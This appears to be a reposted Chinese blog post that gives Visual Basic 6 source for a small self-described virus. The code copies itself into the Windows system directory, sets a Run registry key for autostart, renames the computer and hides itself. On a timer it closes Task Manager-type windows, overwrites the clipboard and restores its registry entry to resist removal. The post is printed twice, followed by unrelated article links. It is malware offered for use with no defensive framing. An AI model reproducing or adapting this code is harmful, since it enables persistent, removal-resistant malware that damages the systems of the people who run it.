简单的木马模板 模式
2008-05-28 18:00
267 查看
GetForegroundWindow 获得前台窗口的句柄
GetClassName 为指定的窗口取得类名
PostMessage 将一条消息投递到指定窗口的消息队列
GetWindowText 取得一个窗体的标题文字
SetComputerName 设置新的计算机名
GetSystemDirectory 取得Windows系统目录
GetWindow 获得一个窗口的句柄
ShowWindow 控制窗口的可见性
RegOpenKey 打开一个现有的注册表项
RegQueryValueEx 获取一个项的设置值
RegSetValueEx 设置指定项的值
RegCloseKey 关闭系统注册表中的一个项
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const GW_OWNER = 4
Public Const SW_HIDE = 0
’在写一个修改注册表的子过程
Public Sub regedit(strPath As String, strKey As String, strValue As String)
Dim l As Long
Dim s As String
Dim s1 As String
Dim n As Long
Dim keyhand As Long
s = String(255, Chr(0))
s1 = String(255, Chr(0))
n = 255
l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)
If l = 0 Then 是否打开
l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)
If l <> 0 Then 是否也有
l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))
’修改注册表
End If
End If
l = RegCloseKey(keyhand)
’关闭
End Sub
2 回到FORM1双击窗休:
Option Explicit
Dim systempath As String
选择LOAD事件
Private Sub Form_Load()
Dim K As Long
'不准重复打开这个程序
Dim title As String
If App.PrevInstance Then
title = App.title
App.title = ""
Me.Caption = ""
AppActivate title
End
End If
'--------------
'得到系统的系统目录
systempath = String(255, Chr(0))
GetSystemDirectory systempath, 254
systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)
'自我复制到系统目录
If Not Dir(systempath & "/" & "liuning.exe") = "liuning.exe" Then
FileCopy App.Path & "/" & App.EXEName & ".exe", systempath & "/" & "liuning.exe"
End If
'自动运行
regedit "SOFTWARE/Microsoft/Windows/CurrentVersion/Run", "甯王小病毒", systempath & "/" & "liuning" & ".exe"
'计算机改名
SetComputerName "QQ122273014"
'隐藏
K = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow K, SW_HIDE
Timer1.Enabled = True
Me.Hide
End Sub
再添加一个TIME1控件
Private Sub Timer1_Timer()
'重点
Dim K As Long
Dim s As String
Dim s1 As String
Static n As Long
s = Space(19)
s1 = Space(19)
'得到句柄
K = GetForegroundWindow
'得到类名
GetClassName K, s, 20
'查看当前程序的标题
GetWindowText K, s1, 20
'打开的是QQ或是其它类名是#32770时关闭
If Left(s, 6) = "#32770" Then
' 打开的是WIN管理器
If Left(s1, 7) = "Windows" Then
PostMessage K, &H10, 0&, 0& ’关闭程序
Exit Sub
End If
n = n + 1
If n >= 40 Then
PostMessage K, &H10, 0&, 0& ’关闭程序
n = 0
End If
End If
'认用户粘贴时就会出现
Clipboard.Clear
Clipboard.SetText "我是甯王我怕谁,我爱你!"
'不准删除注册表里的信息
regedit "SOFTWARE/Microsoft/Windows/CurrentVersion/Run", "甯王小病毒", systempath & "/" & "liuning" & ".exe"
End Sub
GetClassName 为指定的窗口取得类名
PostMessage 将一条消息投递到指定窗口的消息队列
GetWindowText 取得一个窗体的标题文字
SetComputerName 设置新的计算机名
GetSystemDirectory 取得Windows系统目录
GetWindow 获得一个窗口的句柄
ShowWindow 控制窗口的可见性
RegOpenKey 打开一个现有的注册表项
RegQueryValueEx 获取一个项的设置值
RegSetValueEx 设置指定项的值
RegCloseKey 关闭系统注册表中的一个项
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const GW_OWNER = 4
Public Const SW_HIDE = 0
’在写一个修改注册表的子过程
Public Sub regedit(strPath As String, strKey As String, strValue As String)
Dim l As Long
Dim s As String
Dim s1 As String
Dim n As Long
Dim keyhand As Long
s = String(255, Chr(0))
s1 = String(255, Chr(0))
n = 255
l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)
If l = 0 Then 是否打开
l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)
If l <> 0 Then 是否也有
l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))
’修改注册表
End If
End If
l = RegCloseKey(keyhand)
’关闭
End Sub
2 回到FORM1双击窗休:
Option Explicit
Dim systempath As String
选择LOAD事件
Private Sub Form_Load()
Dim K As Long
'不准重复打开这个程序
Dim title As String
If App.PrevInstance Then
title = App.title
App.title = ""
Me.Caption = ""
AppActivate title
End
End If
'--------------
'得到系统的系统目录
systempath = String(255, Chr(0))
GetSystemDirectory systempath, 254
systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)
'自我复制到系统目录
If Not Dir(systempath & "/" & "liuning.exe") = "liuning.exe" Then
FileCopy App.Path & "/" & App.EXEName & ".exe", systempath & "/" & "liuning.exe"
End If
'自动运行
regedit "SOFTWARE/Microsoft/Windows/CurrentVersion/Run", "甯王小病毒", systempath & "/" & "liuning" & ".exe"
'计算机改名
SetComputerName "QQ122273014"
'隐藏
K = GetWindow(Me.hwnd, GW_OWNER)
ShowWindow K, SW_HIDE
Timer1.Enabled = True
Me.Hide
End Sub
再添加一个TIME1控件
Private Sub Timer1_Timer()
'重点
Dim K As Long
Dim s As String
Dim s1 As String
Static n As Long
s = Space(19)
s1 = Space(19)
'得到句柄
K = GetForegroundWindow
'得到类名
GetClassName K, s, 20
'查看当前程序的标题
GetWindowText K, s1, 20
'打开的是QQ或是其它类名是#32770时关闭
If Left(s, 6) = "#32770" Then
' 打开的是WIN管理器
If Left(s1, 7) = "Windows" Then
PostMessage K, &H10, 0&, 0& ’关闭程序
Exit Sub
End If
n = n + 1
If n >= 40 Then
PostMessage K, &H10, 0&, 0& ’关闭程序
n = 0
End If
End If
'认用户粘贴时就会出现
Clipboard.Clear
Clipboard.SetText "我是甯王我怕谁,我爱你!"
'不准删除注册表里的信息
regedit "SOFTWARE/Microsoft/Windows/CurrentVersion/Run", "甯王小病毒", systempath & "/" & "liuning" & ".exe"
End Sub
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 简单理解常用设计模式(七)模板方法模式
- 设计模式-工厂方法 简单工厂 抽象工厂 模板方法
- 用最简单的例子理解模板方法模式(Template Method Pattern)
- *Java在抽象类的简单应用:模板设计模式
- 模板模式c#(非常简单,但又非常简洁好玩)
- 模板方法设计模式简单实现
- 模板模式简单实现
- 模式识别之目标跟踪---最简单的目标跟踪方法--------模板匹配与相关系数法
- 代理模式,简单(静态)工厂模式,单例模式,模板方法模式个人理解
- 学习设计模式:简单工厂、模板方法、单例(上)
- Java中抽象类:模板设计模式与简单工厂设计模式
- 模板模式的简单使用
- 模板设计模式,简单Java代码实现
- 设计模式(06) 模板方法模式(简单入门 行为模式)
- 模板方法模式(Template Method)c#简单例子
- 设计模式-工厂方法 简单工厂 抽象工厂 模板方法
- java模式:模板模式的简单理解
- 设计模式知识连载(41)---简单模板模式:
- seajs学习日志 简单尝试模板+数据合并、模块异步加载、非标准CMD模式定义define模块
- 再起航,我的学习笔记之JavaScript设计模式30(简单模板模式)